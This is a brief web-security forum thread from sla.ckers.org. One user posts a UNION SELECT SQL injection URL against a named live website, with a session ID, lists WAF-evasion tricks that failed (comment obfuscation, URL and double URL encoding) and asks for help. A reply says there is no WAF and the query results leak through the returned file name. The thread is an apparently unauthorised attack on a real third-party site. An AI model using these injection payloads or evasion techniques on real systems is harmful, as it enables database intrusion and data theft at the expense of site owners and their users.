Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
wAF nee help!
Posted by: annen
Date: December 12, 2012 08:39AM

http://www.zug4you.ch/cms/file.php
?PHPSESSID=4afbd15e53033b39eb6fbeb04234dcb8
&id=24 unIoN SEleCT 1,2,3,4,5,6,7,8--+-

I tried /*!*/、 /*!12345*/、URLencode、double URLencode、*、()

but it didn't work! Please help me!

Options: ReplyQuote
Re: wAF nee help!
Posted by: firestorm
Date: December 17, 2012 02:26PM

This is no waf dear.

The result is exciting! The answer of query is returned as file name!
lol!! its bad , my Os cant manage file name larger than 255 characters. Thinking of it, its about 4 times less than what group_concat can return!! lol ...

Thanks for share. I think i'll start collecting "strange sqlis" .

Regards

Options: ReplyQuote
Re: wAF nee help!
Posted by: annen
Date: December 18, 2012 09:08AM

thanks!

Options: ReplyQuote


Sorry, only registered users may post in this forum.